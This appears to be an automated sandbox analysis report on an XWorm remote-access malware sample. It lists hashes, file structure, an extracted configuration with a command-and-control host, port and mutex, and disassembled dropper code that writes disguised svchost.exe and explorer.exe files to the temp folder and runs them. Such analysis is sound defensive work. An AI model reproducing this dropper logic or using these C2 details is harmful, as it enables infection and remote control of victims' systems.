Malicious

Infection Chain
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score: Very low

Hashes
MD5: dc16ed5b1c1cbbaf35179701b1f4035e
SHA1: ec8e01c61fcea9d0560b31786e7eef37a0409fe3
SHA256: dd71110a6b7fb79b2949280611957646f76503f1bda866b06e74b9a74e54dc89
SHA384: ec742d6943746c549882a13d0e808c0122389b21a0559686fe4b8eefcd6c21c188568864274b03e69c0bb8aeeca0f9f2
SHA512: a4e3307131ebd98673f78aaba161a1de32fd835130cfe31cb73b39d67989c82b8c3a0f95d91e53d9e0e2705df2e5ba15d3904fa6471aa3f8ea94b63a84244a52
SSDeep: 49152:QbA3j+MlTnnoIVuE8RjdEOR4IE0ZrmQrpbOx+jSHcZuHanlFeub8WqW:Qb32noKQfZrHVbfub6nloi8D
TLSH: 90E5BF017F458D01E5191B37C2AB4500BBBB9C411AA2FF1BB9A977AD192D3D36C18ECB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual C++ 6.0 DLL (Debug)
Microsoft Visual C++ 7.0 - 8.0
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.sdata
.rsrc
.reloc
Resources
RT_ICON
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
ID:0007
ID:0
ID:0008
ID:0
ID:0009
ID:0
ID:000A
ID:0
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
dc16ed5b1c1cbbaf35179701b1f4035e.decoded.vbs
Malicious
.Net Resources
Malicious
payload.Resources.resources
Malicious
bvElR9l3e6M3DQU5UdF6aCm2nAId.bat
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.sdata
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
.Net Resources
mBW3kdM0SlgTNfrti4.7qrEQ39HaUTCJTB8nS
ybZv9vuBxOQ1YcVX6H.g5pmcghBmAo2PWEKlF
9uzsvDMU6rzTiSa2KoESj40IXyhi3x.vbe
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.didat
.rsrc
.reloc
Resources
PNG
ID:0065
ID:1033
ID:0066
ID:1033
RT_ICON
ID:0001
ID:1033
ID:0002
ID:1033
ID:0003
ID:1033
ID:0004
ID:1033
ID:0005
ID:1033
ID:0006
ID:1033
ID:0007
ID:1033
RT_DIALOG
ID:0000
ID:1033
RT_STRING
ID:0007
ID:1033
ID:0008
ID:1033
ID:0009
ID:1033
ID:000A
ID:1033
ID:000B
ID:1033
ID:000C
ID:1033
ID:000D
ID:1033
ID:000E
ID:1033
ID:000F
ID:1033
ID:0010
ID:1033
RT_GROUP_CURSOR4
ID:0064
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Malware Configuration - XWorm config
Mutex: Rx6I6TBczb3u2uDI
Hosts: tcp.cloudpub.ru
Port: 54193
KEY: <wallacy2k>
USBNM: <Xwormmm>
LoggerPath: %Public%
family: xworm

Information
Info: PE Detect: PeReader OK (file layout)
Info: PDB Path: C:\Users\Professor\Desktop\BitJoiner\payload\obj\Debug\payload.pdb
Module Name: payload.exe
Full Name: payload.exe
EntryPoint: System.Void payload.Main::Main()
Scope Name: payload.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: payload
Assembly Version: 0.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: .NETFramework,Version=v4.7.2
Total Strings: 6
Main Method: System.Void payload.Main::Main()
Main IL Instruction Count: 189
Main IL:

nop <null> ldc.i4.0 <null> stloc.s V_5 nop <null> ldloc.s V_5 brtrue.s IL_000E: ldloc.1 br IL_010C: nop ldloc.1 <null> ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.0 <null> ldloc.0 <null> ldc.i4.0 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::DivideObject(System.Object,System.Object) stloc.s V_4 ldloc.1 <null> ldloc.1 <null> ldc.i4.5 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) ldc.i4 150 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.s 9 box System.Int32 ldloc.s V_4 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::XorObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) stloc.1 <null> ldloc.0 <null> ldc.i4.s 10 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::DivideObject(System.Object,System.Object) ldloc.3 <null> ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.4 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::IntDivideObject(System.Object,System.Object) stloc.2 <null> ldloc.2 <null> ldc.i4.1 <null> box System.Int32 ldloc.0 <null> call System.Object 
Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) ldc.i4.s 15 box System.Int32 ldloc.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::SubtractObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> ldloc.s V_6 ldc.i4.0 <null> box System.Int32 ldloc.1 <null> ldc.i4.1 <null> box System.Int32 ldloca.s V_13 ldloca.s V_6 call System.Boolean Microsoft.VisualBasic.CompilerServices.ObjectFlowControl/ForLoopControl::ForLoopInitObj(System.Object,System.Object,System.Object,System.Object,System.Object&,System.Object&) brfalse.s IL_010C: nop ldloc.2 <null> ldloc.0 <null> ldloc.2 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ModObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> br.s IL_00F6: ldloc.2 ldloc.2 <null> ldc.i4.5 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> nop <null> br.s IL_00FE: nop nop <null> ldloc.2 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brtrue.s IL_00E5: ldloc.2 nop <null> ldloc.s V_6 ldloc.s V_13 ldloca.s V_6 call System.Boolean Microsoft.VisualBasic.CompilerServices.ObjectFlowControl/ForLoopControl::ForNextCheckObj(System.Object,System.Object,System.Object&) brtrue.s IL_00D5: ldloc.2 nop <null> ldloc.s V_5 brtrue.s IL_0119: nop ldc.i4.1 <null> stloc.s V_5 br IL_0004: nop nop <null> br IL_01BF: ldloc.s V_5 ldstr %temp%\ call System.String System.Environment::ExpandEnvironmentVariables(System.String) stloc.s V_7 nop <null> ldloc.s V_7 ldstr svchost.exe call System.String 
System.String::Concat(System.String,System.String) stloc.s V_8 ldloc.s V_7 ldstr \explorer.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_9 ldloc.s V_8 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0159: ldloc.s V_8 ldloc.s V_8 call System.Void System.IO.File::Delete(System.String) nop <null> ldloc.s V_8 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_016F: nop ldloc.s V_8 call System.Byte[] payload.My.Resources.Resources::get__1() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) nop <null> nop <null> ldloc.s V_9 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0181: ldloc.s V_9 ldloc.s V_9 call System.Void System.IO.File::Delete(System.String) nop <null> ldloc.s V_9 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_0197: nop ldloc.s V_9 call System.Byte[] payload.My.Resources.Resources::get__2() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) nop <null> nop <null> ldloc.s V_8 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.s V_9 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_01BA: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01BA: nop nop <null> ldc.i4.0 <null> stloc.s V_5 nop <null> ldloc.s V_5 box System.Boolean call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldloc.2 <null> ldc.i4.0 <null> box System.Int32 ldc.i4.0 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::CompareObjectEqual(System.Object,System.Object,System.Boolean) call System.Object 
Microsoft.VisualBasic.CompilerServices.Operators::NotObject(System.Object) call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldloc.0 <null> ldc.i4.s 50 box System.Int32 ldc.i4.0 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Operators::ConditionalCompareObjectEqual(System.Object,System.Object,System.Boolean) box System.Boolean call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldc.i4.1 <null> box System.Boolean br.s IL_020E: nop ldc.i4.0 <null> box System.Boolean nop <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brtrue IL_011F: ldstr "%temp%\\" nop <null> ret <null>

Artefacts
Mutex: Rx6I6TBczb3u2uDI
CnC: tcp.cloudpub.ru
Port: 54193

dc16ed5b1c1cbbaf35179701b1f4035e (3.3 MB)